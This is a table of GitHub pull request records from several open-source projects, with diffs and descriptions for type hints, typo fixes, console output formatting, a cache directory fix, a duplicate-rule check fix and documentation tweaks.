title (string, 2-169 chars) | diff (string, 235-19.5k chars) | body (string, 0-30.5k chars) | url (string, 48-84 chars) | created_at (string, 20 chars) | closed_at (string, 20 chars) | merged_at (string, 20 chars) | updated_at (string, 20 chars) | diff_len (float64, 101-3.99k) | repo_name (string, 83 classes) | __index_level_0__ (int64, 15-52.7k)
---|---|---|---|---|---|---|---|---|---|---|
Hacktoberfest 2020 - Add typehints and default input for project_euler/problem_25 | diff --git a/project_euler/problem_25/sol1.py b/project_euler/problem_25/sol1.py
index f0228915dc15..c30a74a43cb0 100644
--- a/project_euler/problem_25/sol1.py
+++ b/project_euler/problem_25/sol1.py
@@ -25,7 +25,24 @@
"""
-def fibonacci(n):
+def fibonacci(n: int) -> int:
+ """
+ Computes the Fibonacci number for input n by iterating through n numbers
+ and creating an array of ints using the Fibonacci formula.
+ Returns the nth element of the array.
+
+ >>> fibonacci(2)
+ 1
+ >>> fibonacci(3)
+ 2
+ >>> fibonacci(5)
+ 5
+ >>> fibonacci(10)
+ 55
+ >>> fibonacci(12)
+ 144
+
+ """
if n == 1 or type(n) is not int:
return 0
elif n == 2:
@@ -38,7 +55,21 @@ def fibonacci(n):
return sequence[n]
-def fibonacci_digits_index(n):
+def fibonacci_digits_index(n: int) -> int:
+ """
+ Computes incrementing Fibonacci numbers starting from 3 until the length
+ of the resulting Fibonacci result is the input value n. Returns the term
+ of the Fibonacci sequence where this occurs.
+
+ >>> fibonacci_digits_index(1000)
+ 4782
+ >>> fibonacci_digits_index(100)
+ 476
+ >>> fibonacci_digits_index(50)
+ 237
+ >>> fibonacci_digits_index(3)
+ 12
+ """
digits = 0
index = 2
@@ -49,8 +80,9 @@ def fibonacci_digits_index(n):
return index
-def solution(n):
- """Returns the index of the first term in the Fibonacci sequence to contain
+def solution(n: int = 1000) -> int:
+ """
+ Returns the index of the first term in the Fibonacci sequence to contain
n digits.
>>> solution(1000)
diff --git a/project_euler/problem_25/sol2.py b/project_euler/problem_25/sol2.py
index c98f09b1d316..ed3b54bb351f 100644
--- a/project_euler/problem_25/sol2.py
+++ b/project_euler/problem_25/sol2.py
@@ -25,14 +25,29 @@
"""
-def fibonacci_generator():
+def fibonacci_generator() -> int:
+ """
+ A generator that produces numbers in the Fibonacci sequence
+
+ >>> generator = fibonacci_generator()
+ >>> next(generator)
+ 1
+ >>> next(generator)
+ 2
+ >>> next(generator)
+ 3
+ >>> next(generator)
+ 5
+ >>> next(generator)
+ 8
+ """
a, b = 0, 1
while True:
a, b = b, a + b
yield b
-def solution(n):
+def solution(n: int = 1000) -> int:
"""Returns the index of the first term in the Fibonacci sequence to contain
n digits.
diff --git a/project_euler/problem_25/sol3.py b/project_euler/problem_25/sol3.py
index 4a1d9da76bf7..c66411dc55fc 100644
--- a/project_euler/problem_25/sol3.py
+++ b/project_euler/problem_25/sol3.py
@@ -25,7 +25,7 @@
"""
-def solution(n):
+def solution(n: int = 1000) -> int:
"""Returns the index of the first term in the Fibonacci sequence to contain
n digits.
| ### **Describe your change:**
* [ ] Add an algorithm?
* [x] Fix a bug or typo in an existing algorithm?
* [ ] Documentation change?
### **Checklist:**
* [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md).
* [x] This pull request is all my own work -- I have not plagiarized.
* [x] I know that pull requests will not be merged if they fail the automated tests.
* [ ] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms.
* [x] All new Python files are placed inside an existing directory.
* [x] All filenames are in all lowercase characters with no spaces or dashes.
* [x] All functions and variable names follow Python naming conventions.
* [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html).
* [x] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing.
* [x] All new algorithms have a URL in their comments that points to Wikipedia or another similar explanation.
* [x] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
Related: #2786
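As a hedged aside, one way to verify such doctests locally (the import path is assumed from the diff and may require running from the repository root):
```python
# Hypothetical local check; module path taken from the diff above.
import doctest
import project_euler.problem_25.sol1 as sol1

failed, attempted = doctest.testmod(sol1, verbose=False)
print(f"{attempted} doctests run, {failed} failures")
```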
| https://api.github.com/repos/TheAlgorithms/Python/pulls/2901 | 2020-10-06T05:20:00Z | 2020-10-07T03:57:25Z | 2020-10-07T03:57:25Z | 2020-10-07T03:57:26Z | 849 | TheAlgorithms/Python | 30,300 |
Fix typos in pt-BR README | diff --git a/README.pt-br.md b/README.pt-br.md
index 67365002e..45a8e22c4 100644
--- a/README.pt-br.md
+++ b/README.pt-br.md
@@ -203,7 +203,7 @@ O Rich pode imprimir [tables](https://rich.readthedocs.io/en/latest/tables.html)
A animação acima foi gerada com o arquivo [table_movie.py](https://github.com/textualize/rich/blob/master/examples/table_movie.py) da pasta de exemplos.
-Veja um exemplo mais simple:
+Veja um exemplo mais simples:
```python
from rich.console import Console
@@ -239,9 +239,9 @@ Que gera o seguinte resultado:
![table](https://github.com/textualize/rich/raw/master/imgs/table.png)
-Observe que o markup é renderizado da mesma for que em `print()` e `log()`. De fato, tudo que é renderizável pelo Rich pode ser incluído nos cabeçalhos ou linhas (até mesmo outras tabelas).
+Observe que o markup é renderizado da mesma que em `print()` e `log()`. Na verdade, tudo que é renderizável pelo Rich pode ser incluído nos cabeçalhos ou linhas (até mesmo outras tabelas).
-A classe `Table` é inteligente o suficiente para ajustar o tamanho das colunas para caber na largura do terminal, quebrando o texto em novas linhas quando necessário. Veja a seguir o mesmo exemplo, só que desta vez com um terminal menor do que o tamanho original da tabela:
+A classe `Table` é inteligente o suficiente para ajustar o tamanho das colunas para caber na largura do terminal, quebrando o texto em novas linhas quando necessário. Veja o mesmo exemplo a seguir, só que desta vez com um terminal menor do que o tamanho original da tabela:
![table2](https://github.com/textualize/rich/raw/master/imgs/table2.png)
@@ -250,7 +250,7 @@ A classe `Table` é inteligente o suficiente para ajustar o tamanho das colunas
<details>
<summary>Barra de Progresso</summary>
-O Rich consegue renderizar de forma eficiente multiplas barras de [progresso](https://rich.readthedocs.io/en/latest/progress.html) que podem ser usadas para rastrear o estado de processos longos.
+O Rich consegue renderizar de forma eficiente múltiplas [barras de progresso](https://rich.readthedocs.io/en/latest/progress.html) que podem ser usadas para rastrear o estado de processos longos.
Uma forma simples de usar é passando o iterável para a função `track` e iterar normalmente sobre o retorno. Veja o exemplo a seguir:
@@ -261,7 +261,7 @@ for step in track(range(100)):
do_step(step)
```
-Adicionar multiplas barras de progresso também é simples. Veja outro exemplo que existe na documentação:
+Adicionar múltiplas barras de progresso também é simples. Veja outro exemplo que existe na documentação:
![progress](https://github.com/textualize/rich/raw/master/imgs/progress.gif)
@@ -269,14 +269,14 @@ As colunas podem ser configuradas pra mostrar qualquer detalho necessário. As c
![progress](https://github.com/textualize/rich/raw/master/imgs/downloader.gif)
-Para testar isso no seu terminal, use o arquivo [examples/downloader.py](https://github.com/textualize/rich/blob/master/examples/downloader.py) para fazer o download de multiplas URLs simultaneamente, exibindo o progresso de cada download.
+Para testar isso no seu terminal, use o arquivo [examples/downloader.py](https://github.com/textualize/rich/blob/master/examples/downloader.py) para fazer o download de múltiplas URLs simultaneamente, exibindo o progresso de cada download.
</details>
<details>
<summary>Status</summary>
-Em casos em que é dificil de calcular o progresso da tarefa, você pode usar o método [status](https://rich.readthedocs.io/en/latest/reference/console.html#rich.console.Console.status) que exibe uma animação de um "spinner" e a mensagem. A animação não impede em nada o uso do `console`. Veja o exemplo a seguir:
+Em casos em que é dificil calcular o progresso da tarefa, você pode usar o método [status](https://rich.readthedocs.io/en/latest/reference/console.html#rich.console.Console.status) que exibe uma animação de um "spinner" e a mensagem. A animação não impede em nada o uso do `console`. Veja o exemplo a seguir:
```python
from time import sleep
@@ -311,7 +311,7 @@ O comando acima deve exibir o seguinte no seu terminal:
<details>
<summary>Árvore</summary>
-O Rich pode renderizar [árvores](https://rich.readthedocs.io/en/latest/tree.html) com linhas de identação. Uma árvore é a forma ideal de exibir uma extrutura de arquivos ou qualquer outra apresentação hierárquica de dados.
+O Rich pode renderizar [árvores](https://rich.readthedocs.io/en/latest/tree.html) com linhas de identação. Uma árvore é a forma ideal de exibir uma estrutura de arquivos ou qualquer outra apresentação hierárquica de dados.
Os titulos dos itens da árvore podem ser textos simples ou qualquer coisa que o Rich pode renderizar. Execute o comando a seguir para uma demonstração:
@@ -343,7 +343,7 @@ directory = os.listdir(sys.argv[1])
print(Columns(directory))
```
-O screenshot a seguir é do resultado do [exemplo de colunas](https://github.com/textualize/rich/blob/master/examples/columns.py) formatando em colunas os dados extraidos de uma API:
+O screenshot a seguir é do resultado do [exemplo de colunas](https://github.com/textualize/rich/blob/master/examples/columns.py) formatando em colunas os dados extraídos de uma API:
![columns](https://github.com/textualize/rich/raw/master/imgs/columns.png)
@@ -354,7 +354,7 @@ O screenshot a seguir é do resultado do [exemplo de colunas](https://github.com
O Rich pode renderizar [markdown](https://rich.readthedocs.io/en/latest/markdown.html) e faz um bom trabalho de conversão do formato para o terminal.
-Para renderizar markdowm, importe a classe `Markdown` e instancie com a string que contem o código markdown. Depois, imprima o objeto no console. Por exemplo:
+Para renderizar markdowm, importe a classe `Markdown` e instancie com a string que contém o código markdown. Depois, imprima o objeto no console. Por exemplo:
```python
from rich.console import Console
@@ -418,13 +418,13 @@ Veja o resultado disso no OSX (resultados semelhantes no Linux):
</details>
-Todos os renderizaveis do Rich usam o [Protocolo do Console](https://rich.readthedocs.io/en/latest/protocol.html), que você pode usar para implementar o seu próprio conteúdo Rich.
+Todos os renderizáveis do Rich usam o [Protocolo do Console](https://rich.readthedocs.io/en/latest/protocol.html), que você pode usar para implementar o seu próprio conteúdo Rich.
# Rich para empresas
Disponível como parte da assinatura Tidelift.
-Os mantenedores do Rich e milhares de outros pacotes estão trabalhando com o Tidelift para disponibilizar suporte comercial e manutenção de projetos de código aberto usados nas suas aplicações. Economise tempo, reduza riscos e melhore a saúde do código enquanto paga os mantenedores dos pacotes exatos que você usa. [Mais detalhes.](https://tidelift.com/subscription/pkg/pypi-rich?utm_source=pypi-rich&utm_medium=referral&utm_campaign=enterprise&utm_term=repo)
+Os mantenedores do Rich e milhares de outros pacotes estão trabalhando com o Tidelift para disponibilizar suporte comercial e manutenção de projetos de código aberto usados nas suas aplicações. Economize tempo, reduza riscos e melhore a qualidade do código enquanto paga os mantenedores dos pacotes exatos que você usa. [Mais detalhes.](https://tidelift.com/subscription/pkg/pypi-rich?utm_source=pypi-rich&utm_medium=referral&utm_campaign=enterprise&utm_term=repo)
# Projetos usando Rich
| ## Type of changes
- [ ] Bug fix
- [ ] New feature
- [x] Documentation / docstrings
- [ ] Tests
- [ ] Other
## Checklist
- [ ] I've run the latest [black](https://github.com/psf/black) with default args on new code.
- [ ] I've updated CHANGELOG.md and CONTRIBUTORS.md where appropriate.
- [ ] I've added tests for new code.
- [x] I accept that @willmcgugan may be pedantic in the code review. :smile:
## Description
Learned today that rich has README files in other languages (from a tweet about Polish, I believe) and decided to read the pt-BR version. Spotted a few typos, so prepared this PR. Thanks!
| https://api.github.com/repos/Textualize/rich/pulls/2845 | 2023-03-04T10:56:54Z | 2023-03-04T11:09:57Z | 2023-03-04T11:09:57Z | 2023-03-04T18:47:15Z | 1,955 | Textualize/rich | 48,388 |
Formatted Model Summary | diff --git a/models/ModelBase.py b/models/ModelBase.py
index f841ca6ad..e7ad843bc 100644
--- a/models/ModelBase.py
+++ b/models/ModelBase.py
@@ -231,36 +231,54 @@ def __init__(self, model_path, training_data_src_path=None, training_data_dst_pa
else:
self.sample_for_preview = self.generate_next_sample()
self.last_sample = self.sample_for_preview
+
+ ###Generate text summary of model hyperparameters
+ #Find the longest key name and value string. Used as column widths.
+ width_name = max([len(k) for k in self.options.keys()] + [17]) + 1 # Single space buffer to left edge. Minimum of 17, the length of the longest static string used "Current iteration"
+ width_value = max([len(str(x)) for x in self.options.values()] + [len(str(self.iter)), len(self.get_model_name())]) + 1 # Single space buffer to right edge
+ if not self.device_config.cpu_only: #Check length of GPU names
+ width_value = max([len(nnlib.device.getDeviceName(idx))+1 for idx in self.device_config.gpu_idxs] + [width_value])
+ width_total = width_name + width_value + 2 #Plus 2 for ": "
+
model_summary_text = []
-
- model_summary_text += ["===== Model summary ====="]
- model_summary_text += ["== Model name: " + self.get_model_name()]
- model_summary_text += ["=="]
- model_summary_text += ["== Current iteration: " + str(self.iter)]
- model_summary_text += ["=="]
- model_summary_text += ["== Model options:"]
+ model_summary_text += [f'=={" Model Summary ":=^{width_total}}=='] # Model/status summary
+ model_summary_text += [f'=={" "*width_total}==']
+ model_summary_text += [f'=={"Model name": >{width_name}}: {self.get_model_name(): <{width_value}}=='] # Name
+ model_summary_text += [f'=={" "*width_total}==']
+ model_summary_text += [f'=={"Current iteration": >{width_name}}: {str(self.iter): <{width_value}}=='] # Iter
+ model_summary_text += [f'=={" "*width_total}==']
+
+ model_summary_text += [f'=={" Model Options ":-^{width_total}}=='] # Model options
+ model_summary_text += [f'=={" "*width_total}==']
for key in self.options.keys():
- model_summary_text += ["== |== %s : %s" % (key, self.options[key])]
-
+ model_summary_text += [f'=={key: >{width_name}}: {str(self.options[key]): <{width_value}}=='] # self.options key/value pairs
+ model_summary_text += [f'=={" "*width_total}==']
+
+ model_summary_text += [f'=={" Running On ":-^{width_total}}=='] # Training hardware info
+ model_summary_text += [f'=={" "*width_total}==']
if self.device_config.multi_gpu:
- model_summary_text += ["== |== multi_gpu : True "]
-
- model_summary_text += ["== Running on:"]
+ model_summary_text += [f'=={"Using multi_gpu": >{width_name}}: {"True": <{width_value}}=='] # multi_gpu
+ model_summary_text += [f'=={" "*width_total}==']
if self.device_config.cpu_only:
- model_summary_text += ["== |== [CPU]"]
+ model_summary_text += [f'=={"Using device": >{width_name}}: {"CPU": <{width_value}}=='] # cpu_only
else:
for idx in self.device_config.gpu_idxs:
- model_summary_text += ["== |== [%d : %s]" % (idx, nnlib.device.getDeviceName(idx))]
-
- if not self.device_config.cpu_only and self.device_config.gpu_vram_gb[0] == 2:
- model_summary_text += ["=="]
- model_summary_text += ["== WARNING: You are using 2GB GPU. Result quality may be significantly decreased."]
- model_summary_text += ["== If training does not start, close all programs and try again."]
- model_summary_text += ["== Also you can disable Windows Aero Desktop to get extra free VRAM."]
- model_summary_text += ["=="]
-
- model_summary_text += ["========================="]
- model_summary_text = "\r\n".join (model_summary_text)
+ model_summary_text += [f'=={"Device index": >{width_name}}: {idx: <{width_value}}=='] # GPU hardware device index
+ model_summary_text += [f'=={"Name": >{width_name}}: {nnlib.device.getDeviceName(idx): <{width_value}}=='] # GPU name
+ vram_str = f'{nnlib.device.getDeviceVRAMTotalGb(idx):.2f}GB' # GPU VRAM - Formated as #.## (or ##.##)
+ model_summary_text += [f'=={"VRAM": >{width_name}}: {vram_str: <{width_value}}==']
+ model_summary_text += [f'=={" "*width_total}==']
+ model_summary_text += [f'=={"="*width_total}==']
+
+ if not self.device_config.cpu_only and self.device_config.gpu_vram_gb[0] <= 2: # Low VRAM warning
+ model_summary_text += ["/!\\"]
+ model_summary_text += ["/!\\ WARNING:"]
+ model_summary_text += ["/!\\ You are using a GPU with 2GB or less VRAM. This may significantly reduce the quality of your result!"]
+ model_summary_text += ["/!\\ If training does not start, close all programs and try again."]
+ model_summary_text += ["/!\\ Also you can disable Windows Aero Desktop to increase available VRAM."]
+ model_summary_text += ["/!\\"]
+
+ model_summary_text = "\n".join (model_summary_text)
self.model_summary_text = model_summary_text
io.log_info(model_summary_text)
| Aligns the model summary output using f-string formatting. The logic structure of the base class has not been changed, only the lines put into `model_summary_text`. Output width is calculated from keys & values and will scale to show a clean summary for any model/platform.
GPU VRAM has been added as an output. Incorrect detection of VRAM is possible in broken environments and GPUs of different sizes can report the same name. Showing it here adds clarity for the user and for issue tickets.
Concatenation changed from "\r\n" to "\n"; CRLF line endings on Windows are handled transparently, so using "\r\n" here caused extra blank lines in the summary txt file.
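As a minimal, self-contained sketch of the f-string alignment idea (values are illustrative, not the exact variables in `ModelBase.py`):
```python
options = {"batch_size": 4, "resolution": 128, "archi": "liae"}

width_name = max(len(k) for k in options) + 1                 # left column
width_value = max(len(str(v)) for v in options.values()) + 1  # right column
width_total = width_name + width_value + 2                    # plus 2 for ": "

lines = [f'=={" Model Summary ":=^{width_total}}==']          # centered, '=' fill
for key, value in options.items():
    lines.append(f'=={key: >{width_name}}: {str(value): <{width_value}}==')
print("\n".join(lines))
```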
**Examples:**
Using CUDA + SAE-LIAE
```
============= Model Summary ==============
== ==
== Model name: SAE ==
== ==
== Current iteration: 16 ==
== ==
==----------- Model Options ------------==
== ==
== batch_size: 4 ==
== sort_by_yaw: False ==
== random_flip: True ==
== resolution: 128 ==
== face_type: f ==
== learn_mask: True ==
== optimizer_mode: 1 ==
== archi: liae ==
== ae_dims: 256 ==
== e_ch_dims: 42 ==
== d_ch_dims: 21 ==
== multiscale_decoder: False ==
== ca_weights: False ==
== pixel_loss: False ==
== face_style_power: 0.0 ==
== bg_style_power: 0.0 ==
== apply_random_ct: False ==
== clipgrad: False ==
== ==
==------------- Running On -------------==
== ==
== Device index: 0 ==
== Name: GeForce GTX 1080 ==
== VRAM: 8.00GB ==
== ==
==========================================
```
Colab
```
========== Model Summary ==========
== ==
== Model name: SAE ==
== ==
== Current iteration: 39822 ==
== ==
==-------- Model Options --------==
== ==
== batch_size: 24 ==
== sort_by_yaw: True ==
== random_flip: False ==
== resolution: 128 ==
== face_type: f ==
== learn_mask: True ==
== optimizer_mode: 2 ==
== archi: liae ==
== ae_dims: 222 ==
== e_ch_dims: 34 ==
== d_ch_dims: 16 ==
== multiscale_decoder: True ==
== ca_weights: True ==
== pixel_loss: False ==
== face_style_power: 2.0 ==
== bg_style_power: 1.5 ==
== apply_random_ct: False ==
== clipgrad: True ==
== ==
==--------- Running On ----------==
== ==
== Device index: 0 ==
== Name: Tesla K80 ==
== VRAM: 11.00GB ==
== ==
===================================
```
Using OpenCL + H128
```
=========================== Model Summary ===========================
== ==
== Model name: H128 ==
== ==
== Current iteration: 0 ==
== ==
==------------------------- Model Options -------------------------==
== ==
== batch_size: 4 ==
== sort_by_yaw: False ==
== random_flip: True ==
== lighter_ae: False ==
== pixel_loss: False ==
== ==
==-------------------------- Running On ---------------------------==
== ==
== Device index: 0 ==
== Name: Advanced Micro Devices, Inc. gfx900 (OpenCL) ==
== VRAM: 7.98GB ==
== ==
=====================================================================
```
Using CPU (output trimmed)
```
==------- Running On --------==
== ==
== Using device: CPU ==
== ==
===============================
```
multi_gpu support is retained (output trimmed)
```
==------------- Running On -------------==
== ==
== Using multi_gpu: True ==
== ==
== Device index: 1 ==
== Name: Geforce GTX 1080 ==
== VRAM: 8.00GB ==
== Device index: 2 ==
== Name: Geforce GTX 1080 ==
== VRAM: 8.00GB ==
== ==
==========================================
```
Low VRAM warning (output trimmed)
```
==------------- Running On -------------==
== ==
== Device index: 0 ==
== Name: Geforce GTX 1050 ==
== VRAM: 2.00GB ==
== ==
==========================================
/!\
/!\ WARNING:
/!\ You are using a GPU with 2GB or less VRAM. This may significantly reduce the quality of your result!
/!\ If training does not start, close all programs and try again.
/!\ Also you can disable Windows Aero Desktop to increase available VRAM.
/!\
``` | https://api.github.com/repos/iperov/DeepFaceLab/pulls/348 | 2019-08-16T07:28:55Z | 2019-08-16T14:35:28Z | 2019-08-16T14:35:28Z | 2019-08-23T23:38:26Z | 1,402 | iperov/DeepFaceLab | 33,387 |
Corrected a typo in elasticsearch.ipynb | diff --git a/docs/extras/modules/data_connection/text_embedding/integrations/elasticsearch.ipynb b/docs/extras/modules/data_connection/text_embedding/integrations/elasticsearch.ipynb
index 2f8c6a96253558..185811f4f5d7a5 100644
--- a/docs/extras/modules/data_connection/text_embedding/integrations/elasticsearch.ipynb
+++ b/docs/extras/modules/data_connection/text_embedding/integrations/elasticsearch.ipynb
@@ -9,7 +9,7 @@
"# Elasticsearch\n",
"Walkthrough of how to generate embeddings using a hosted embedding model in Elasticsearch\n",
"\n",
- "The easiest way to instantiate the `ElasticsearchEmebddings` class it either\n",
+ "The easiest way to instantiate the `ElasticsearchEmbeddings` class it either\n",
"- using the `from_credentials` constructor if you are using Elastic Cloud\n",
"- or using the `from_es_connection` constructor with any Elasticsearch cluster"
],
| Simple typo fix | https://api.github.com/repos/langchain-ai/langchain/pulls/7318 | 2023-07-07T04:34:14Z | 2023-07-07T05:35:32Z | 2023-07-07T05:35:32Z | 2023-07-07T05:35:33Z | 219 | langchain-ai/langchain | 42,915 |
Fixed config.json download to go to user-supplied cache directory | diff --git a/src/transformers/pipelines/__init__.py b/src/transformers/pipelines/__init__.py
index 8ee0137a20b3f..e60035dd5732d 100755
--- a/src/transformers/pipelines/__init__.py
+++ b/src/transformers/pipelines/__init__.py
@@ -782,6 +782,7 @@ def pipeline(
_raise_exceptions_for_gated_repo=False,
_raise_exceptions_for_missing_entries=False,
_raise_exceptions_for_connection_errors=False,
+ cache_dir=model_kwargs.get("cache_dir"),
**hub_kwargs,
)
hub_kwargs["_commit_hash"] = extract_commit_hash(resolved_config_file, commit_hash)
Before, config.json would end up in the default cache directory. Now everything but version.txt is placed properly; since version.txt is downloaded when `pipeline` is imported, fixing that will be more complex.
I ran "pytest --picked"; it generated 3 warnings, none of which seemed to have anything to do with my change.
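A hedged usage sketch of the behavior this fixes (model name and cache path are illustrative):
```python
from transformers import pipeline

# With this change, config.json should land under the user-supplied cache_dir
# rather than the default cache directory.
pipe = pipeline(
    "text-classification",
    model="distilbert-base-uncased-finetuned-sst-2-english",
    model_kwargs={"cache_dir": "/tmp/my-hf-cache"},
)
```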
@Narsil since this is related to pipeline. | https://api.github.com/repos/huggingface/transformers/pulls/30189 | 2024-04-11T15:14:09Z | 2024-04-12T17:03:49Z | 2024-04-12T17:03:49Z | 2024-04-12T18:16:37Z | 154 | huggingface/transformers | 12,063 |
Format and grammar tweak | diff --git a/README.md b/README.md
index 68b6c09..fdbd15b 100644
--- a/README.md
+++ b/README.md
@@ -1805,7 +1805,8 @@ x, y = (0, 1) if True else None, None
((0, 1), None)
```
-Almost every Python programmer would have faced a similar situation.
+Almost every Python programmer has faced a similar situation.
+
2\.
```py
t = ('one', 'two')
| * Tweaked a line break so a section number was correctly formatted
* Tweaked grammar to be slightly more natural
Hello! I started this pull request because the formatting was snafued there, but also made a tiny tweak to the wording when I was there!
Thanks for a very entertaining and educational page. | https://api.github.com/repos/satwikkansal/wtfpython/pulls/59 | 2018-01-27T16:05:11Z | 2018-01-29T10:06:03Z | 2018-01-29T10:06:03Z | 2018-01-29T10:07:06Z | 119 | satwikkansal/wtfpython | 25,847 |
[RLLib] Small parallel iterator doc fix. | diff --git a/doc/source/rllib-concepts.rst b/doc/source/rllib-concepts.rst
index c35190a25b29c..db3e844838fdd 100644
--- a/doc/source/rllib-concepts.rst
+++ b/doc/source/rllib-concepts.rst
@@ -614,7 +614,7 @@ In code, this dataflow can be expressed as the following execution plan, which i
return StandardMetricsReporting(train_op, workers, config)
-As you can see, each step returns an *iterator* over objects (if you're unfamiliar with distributed iterators, see Ray's `parallel iterators documentation <iter.html>`__). The reason it is a ``LocalIterator`` is that, though it is based on a parallel computation, the iterator has been turned into one that can be consumed locally in sequence by the program. A couple other points to note:
+As you can see, each step returns an *iterator* over objects (if you're unfamiliar with distributed iterators, see Ray's `parallel iterators implementation <https://github.com/ray-project/ray/blob/master/python/ray/util/iter.py>`__). The reason it is a ``LocalIterator`` is that, though it is based on a parallel computation, the iterator has been turned into one that can be consumed locally in sequence by the program. A couple other points to note:
- The reason the plan returns an iterator over training results, is that ``trainer.train()`` is pulling results from this iterator to return as the result of the train call.
- The rollout workers have been already created ahead of time in the ``WorkerSet``, so the execution plan function is only defining a sequence of operations over the results of the rollouts.
@@ -624,7 +624,7 @@ These iterators represent the infinite stream of data items that can be produced
Understanding and Debugging Execution Plans
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-Execution plans are based on Ray `parallel iterators <iter.html>`__ and can be inspected similarly. For example, suppose you wanted to print out the intermediate data items during training. This can be done by inserting a print function into the dataflow, e.g., for A2C:
+Execution plans are based on Ray `parallel iterators <https://github.com/ray-project/ray/blob/master/python/ray/util/iter.py>`__ and can be inspected similarly. For example, suppose you wanted to print out the intermediate data items during training. This can be done by inserting a print function into the dataflow, e.g., for A2C:
.. code-block:: python
| ## Why are these changes needed?
/iter.html was removed when the Ray Datasets documentation was introduced.
Pointing to the source code seems like the best option available at this point.
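For readers unfamiliar with that module, a small sketch of the API it implements (based on the `ray.util.iter` interface at the time; treat names as indicative):
```python
import ray
from ray.util.iter import from_items

ray.init()
it = from_items([1, 2, 3, 4], num_shards=2)             # distributed ParallelIterator
local_it = it.for_each(lambda x: x * 2).gather_sync()   # LocalIterator, consumed locally in sequence
print(list(local_it))  # e.g. [2, 6, 4, 8] depending on shard interleaving
```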
## Related issue number
N/A
## Checks
- [ ] I've run `scripts/format.sh` to lint the changes in this PR.
- [x] I've included any doc changes needed for https://docs.ray.io/en/master/.
- [ ] I've made sure the tests are passing. Note that there might be a few flaky tests, see the recent failures at https://flakey-tests.ray.io/
- Testing Strategy
- [ ] Unit tests
- [ ] Release tests
- [ ] This PR is not tested :(
| https://api.github.com/repos/ray-project/ray/pulls/18043 | 2021-08-24T15:42:15Z | 2021-08-24T17:57:59Z | 2021-08-24T17:57:58Z | 2021-08-25T11:57:08Z | 540 | ray-project/ray | 19,798 |
ref(rules): Fix dupe check on edit | diff --git a/src/sentry/api/endpoints/project_rule_details.py b/src/sentry/api/endpoints/project_rule_details.py
index 50c2d6246ab17..6855d8f84325f 100644
--- a/src/sentry/api/endpoints/project_rule_details.py
+++ b/src/sentry/api/endpoints/project_rule_details.py
@@ -142,7 +142,7 @@ def put(self, request: Request, project, rule) -> Response:
"actions": data["actions"],
"frequency": data.get("frequency"),
}
- duplicate_rule = find_duplicate_rule(kwargs, project)
+ duplicate_rule = find_duplicate_rule(kwargs, project, rule.id)
if duplicate_rule:
return Response(
{
diff --git a/src/sentry/api/endpoints/project_rule_enable.py b/src/sentry/api/endpoints/project_rule_enable.py
index 14ce44dcf1714..95a0cabb3a489 100644
--- a/src/sentry/api/endpoints/project_rule_enable.py
+++ b/src/sentry/api/endpoints/project_rule_enable.py
@@ -39,7 +39,7 @@ def put(self, request: Request, project, rule_id) -> Response:
status=status.HTTP_400_BAD_REQUEST,
)
- duplicate_rule = find_duplicate_rule(rule.data, project)
+ duplicate_rule = find_duplicate_rule(rule.data, project, rule_id)
if duplicate_rule:
return Response(
{
diff --git a/src/sentry/api/endpoints/project_rules.py b/src/sentry/api/endpoints/project_rules.py
index 52aaedadb823c..5060240b12cd9 100644
--- a/src/sentry/api/endpoints/project_rules.py
+++ b/src/sentry/api/endpoints/project_rules.py
@@ -34,9 +34,11 @@ def pre_save_rule(instance, sender, *args, **kwargs):
clean_rule_data(instance.data.get("actions", []))
-def find_duplicate_rule(rule_data, project):
+def find_duplicate_rule(rule_data, project, rule_id=None):
matchers = [key for key in list(rule_data.keys()) if key not in ("name", "user_id")]
- existing_rules = Rule.objects.filter(project=project, status=ObjectStatus.ACTIVE)
+ existing_rules = Rule.objects.exclude(id=rule_id).filter(
+ project=project, status=ObjectStatus.ACTIVE
+ )
for existing_rule in existing_rules:
keys = 0
matches = 0
diff --git a/tests/sentry/api/endpoints/test_project_rule_details.py b/tests/sentry/api/endpoints/test_project_rule_details.py
index f4dea8dba58f9..1ea7e48d35be2 100644
--- a/tests/sentry/api/endpoints/test_project_rule_details.py
+++ b/tests/sentry/api/endpoints/test_project_rule_details.py
@@ -454,6 +454,43 @@ def test_update_duplicate_rule(self):
== f"This rule is an exact duplicate of '{rule.label}' in this project and may not be created."
)
+ def test_edit_rule(self):
+ """Test that you can edit an alert rule w/o it comparing it to itself as a dupe"""
+ conditions = [
+ {
+ "id": "sentry.rules.conditions.first_seen_event.FirstSeenEventCondition",
+ }
+ ]
+ actions = [
+ {
+ "targetType": "IssueOwners",
+ "fallthroughType": "ActiveMembers",
+ "id": "sentry.mail.actions.NotifyEmailAction",
+ "targetIdentifier": "",
+ }
+ ]
+ self.create_project_rule(
+ project=self.project, action_match=actions, condition_match=conditions
+ )
+ conditions.append(
+ {
+ "id": "sentry.rules.conditions.event_frequency.EventFrequencyPercentCondition",
+ "interval": "1h",
+ "value": "100",
+ "comparisonType": "count",
+ }
+ )
+ payload = {
+ "name": "hello world",
+ "environment": self.environment.name,
+ "actionMatch": "all",
+ "actions": actions,
+ "conditions": conditions,
+ }
+ self.get_success_response(
+ self.organization.slug, self.project.slug, self.rule.id, status_code=200, **payload
+ )
+
def test_with_environment(self):
payload = {
"name": "hello world",
| In some cases when you edit an alert rule (maybe not immediately after creating it?) it's comparing the rule to itself for the duplicate check, so let's explicitly exclude that id from the comparison. | https://api.github.com/repos/getsentry/sentry/pulls/55361 | 2023-08-29T16:54:41Z | 2023-08-29T17:58:30Z | 2023-08-29T17:58:30Z | 2023-09-14T00:02:52Z | 958 | getsentry/sentry | 44,249 |
✏️ A few tweaks in `docs/de/docs/tutorial/first-steps.md` | diff --git a/docs/de/docs/tutorial/first-steps.md b/docs/de/docs/tutorial/first-steps.md
index 5997f138f0ac3..27ba3ec16795e 100644
--- a/docs/de/docs/tutorial/first-steps.md
+++ b/docs/de/docs/tutorial/first-steps.md
@@ -43,7 +43,7 @@ Diese Zeile zeigt die URL, unter der Ihre Anwendung auf Ihrem lokalen Computer b
Öffnen Sie Ihren Browser unter <a href="http://127.0.0.1:8000" class="external-link" target="_blank">http://127.0.0.1:8000.</a>
-Sie werden folgende JSON-Antwort sehen:
+Sie werden folgende JSON-Response sehen:
```JSON
{"message": "Hello World"}
